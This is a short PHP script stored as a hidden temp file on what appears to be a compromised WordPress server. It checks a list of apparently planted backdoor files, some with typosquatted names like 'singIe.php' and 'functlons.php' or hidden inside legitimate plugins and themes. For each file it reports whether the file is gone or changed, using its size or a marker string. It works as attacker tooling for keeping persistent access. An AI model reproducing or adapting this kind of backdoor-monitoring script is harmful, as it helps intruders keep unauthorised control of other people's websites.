File: //var/tmp/.hld
<?php $r = '/home/daimaukr/volnytsia.org'; $x = ["/wp-content/plugins/custom_1751122859/wp-config.php"=>"bd@@430673@@727",
"/wp-content/themes/custom-file-2-1751701291/singIe.php"=>"bd@@439679@@727",
"/559f77.php"=>"bd@@31144@@226",
"/wp-content/themes/steira/index.php"=>"bd@@339119@@Feature-Policy",
"/wp-content/plugins/slider-1748023997/functlons.php"=>"bd@@259544@@727",
"/wp-content/plugins/civicrm/civicrm/packages/Net/UserAgent/Detect.php"=>"bd@@384985@@Server-Timing",
"/wp-content/themes/twentytwentytwo/inc/patterns/page-about-media-right.php"=>"bd@@385248@@_COOKIE[3]",
"/wp-content/themes/pilcrow/index.php"=>"bd@@405894@@Server-Timing",
"/wp-content/plugins/civicrm/civicrm/api/v3/Survey.php"=>"bd@@378025@@If-Modified-Since",
"/wp-content/plugins/civicrm/civicrm/settings/Extension.setting.php"=>"bd@@268461@@auth_exception_handler",
"/wp-content/plugins/jetpack/_inc/build/twitter-timeline.min.asset.php"=>"bd@@240048@@Content-Security-Policy",
"/wp-content/themes/twentysixteen/sidebar-content-bottom.php"=>"bd@@391119@@Clear-Site-Data",
"/wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-bulk-delete-post-endpoint.php"=>"bd@@405982@@Authorization"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');